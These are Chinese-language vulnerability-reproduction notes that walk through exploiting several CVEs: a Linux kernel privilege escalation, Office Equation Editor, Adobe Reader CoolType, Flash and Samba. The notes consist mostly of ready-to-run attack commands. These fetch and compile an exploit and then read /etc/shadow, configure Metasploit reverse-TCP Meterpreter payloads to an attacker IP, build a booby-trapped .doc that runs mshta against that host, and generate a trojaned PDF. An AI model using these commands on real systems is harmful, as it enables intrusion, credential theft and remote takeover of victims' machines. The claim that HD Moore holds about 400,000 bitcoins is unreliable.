漏洞复现
参考链接:https://github.com/B1eed/VulRec
CVE-2017-16995 Ubuntu16.04
参考学习链接:https://zhuanlan.zhihu.com/p/35247850
影响版本:
Linux内核:Linux Kernel Version 4.14 ~ 4.4
Ubuntu版本:16.04.01~ 16.04.04
测试命令:cat /proc/version
执行命令:
wget http://cyseclabs.com/pub/upstream44.c
sudo apt install gcc
gcc -o test upstream44.c
chmod +x test
ll
./test
id
cat /etc/shadow
[漏洞复现] CVE-2017-11882 通杀所有Office版本
此漏洞是由Office软件里面的 [公式编辑器] 造成的,由于编辑器进程没有对名称长度进行校验,导致缓冲区溢出,攻击者通过构造特殊的字符,可以实现任意代码执行。
举个例子,如果黑客利用这个漏洞,构造带有shell后门的office文件,当普通用户打开这个office文件,则电脑可以被黑客直接控制。
影响版本:
office 2003
office 2007
office 2010
office 2013
office 2016
攻击命令记录:
search CVE-2017-11882 //查看有无该payload
use exploit/windows/smb/cve-2017-11882
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.23.154 // (渗透机IP)
set uripath 11882
exploit
# 生成攻击文件
python CVE-2017-11882.py -c "mshta http://192.168.23.154:8080/11882" -o 11882-3.doc //注意修改为渗透机IP地址
# 把对应msf的payload文件(rb后缀)放到对应目录,下面是绝对目录路径
cd /usr/share/metasploit-framework/modules/exploits/windows/smb
攻击成功
参考链接:https://zhuanlan.zhihu.com/p/35248996
[漏洞复现] CVE-2010-2883 Adobe Reader 打开pdf电脑即刻中招
CVE-2010-2883漏洞原理:“Adobe Reader在处理CoolType字体文件的sing表时,存在栈溢出漏洞,当打开特制的恶意PDF文件时,可允许任意代码远程执行。”
影响版本:Adobe Reader 8.2.4 - 9.3.4
攻击命令记录:
# 搜索Adobe渗透模块
search adobe_cooltype_sing
# 调用渗透模块
use exploit/windows/fileformat/adobe_cooltype_sing/
info
# 调用meterpreter载荷,反向连接到渗透机
set payload windows/meterpreter/reverse_tcp
# 设置Kali Linux的IP地址
set LHOST 192.168.23.154
# 设置本地监听端口
set LPORT 8888
# 设置带有后门程序的PDF文件
set FILENAME PINGINGLAB.pdf
# 执行渗透生成文件
exploit
# 将PDF木马文件拷贝至Kali Linux桌面
cp /root/.msf4/local/PINGINGLAB.pdf /root/Desktop/PINGINGLAB.pdf
# Metasploit开启shell监听会话,等待肉鸡上线
# 使用handler监听模块
use exploit/multi/handler
# 回弹一个tcp连接
set payload windows/meterpreter/reverse_tcp
# 设置监听IP地址(跟PDF木马文件一致)
set LHOST 192.168.23.154
# 设置监听的端口(跟PDF木马文件一致)
set LPORT 8888
# 开启监听
exploit
安装对应版本Adobe 参考网址:https://zhuanlan.zhihu.com/p/35249958
[漏洞复现] CVE-2018-4878 Flash 0day
2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。
攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。
[漏洞复现] CVE-2017-7494 隐藏7年之久的Linux版”永恒之蓝”出现了…
漏洞原理: Samba是在Linux或Unix系统上用来实现文件共享和打印服务的通信协议,也是很多家用的智能硬件设备例如NAS设备内置的协议,采用服务端口445。由于Samba内置函数is_known_pipename里面出现字符过滤问题,导致攻击者可以向共享目录传递恶意文件,导致被远程代码执行。
参考链接: https://cvedetails.com/cve/CVE-2017-7494/ https://www.samba.org/samba/security/CVE-2017-7494.html
影响版本: Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。
渗透代码: 关于此Samba漏洞的渗透利用代码,最早发布的,便是鼎鼎大名的Metasploit创始人HD Moore。HD Moore出名,不仅仅在黑客和安全圈,在目前的币圈也是一位传奇,毕竟手握约40万个比特币,是世界上除了比特币创始人中本聪之外,持币量最多的人。就是这位“比你有钱又比你有才”的传奇人物,他在Samba漏洞公告的第二天,也就是2017年5月25号,就在github上公布了针对此漏洞的exp代码。当然,目前Metasploit框架也已经集成了这个exp代码。
参考链接:https://zhuanlan.zhihu.com/p/35321152
CVE-2018-15982FlashPlayer漏洞复现
参考链接:https://bbs.ichunqiu.com/thread-48986-1-1.html